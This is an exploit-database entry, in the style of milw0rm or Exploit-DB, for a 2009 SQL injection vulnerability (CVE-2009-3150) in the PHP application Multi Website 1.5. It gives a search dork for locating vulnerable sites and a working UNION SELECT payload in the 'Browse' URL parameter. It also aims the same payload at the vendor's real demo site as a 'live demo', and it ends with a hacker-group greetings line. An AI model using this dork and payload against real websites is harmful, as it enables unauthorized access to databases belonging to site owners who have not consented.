Multi Website 1.5 - index PHP action SQL Injection

Author: SarBoT511
type: webapps
platform: php
port: 
date_added: 2009-08-02 
date_updated:  
verified: 1 
codes: OSVDB-56748;CVE-2009-3150 
tags: 
aliases:  
screenshot_url:  
application_url: 

> > [+] Bug : Powered by Multi Website 1.5 (index php action) Remote SQL Injection Vulnerability
> >
> > [+] Script home : http://www.multi-website.com
> >
> > [+] Affected versions : 1.5
> >
> > [+] Solution : nothing .;
> > > >
> > > > =======================================================
> > > >
> > > > ==> AuThOr : SarboT511
> > > >
> > > > ==> EmaiL : xs3@hotmail.com
> > > >
> > > > ==> HomE : www.lezr.com
> > > >
> > > > ==> DorK : Powered by Multi Website 1.5
> > > >
> > > > ==> Control panel script : http://localhost/[path]/admin/login.php
> > > >
> > > > ========================================================
> > > >
> > > > ==> ExplO!t :
> > > >
> > > > www.target.com/[path]/?action=vote&Browse=-1+union+select+1,@@version--
> > > >=========================================================
> > > > L!VE Demo :
> > > >
> > >  http://www.multi-website.com/demo/?action=vote&Browse=-1+union+select+1,@@version--
> > =============================================================
> > greats to : his0k4 , The g0bL!n , black zero , thirdd_Devil ,devil
> > fucker ,3loosh_al7rbi ,HCj , ALM 511 , all members [ lezr.com ] .#

# milw0rm.com [2009-08-03]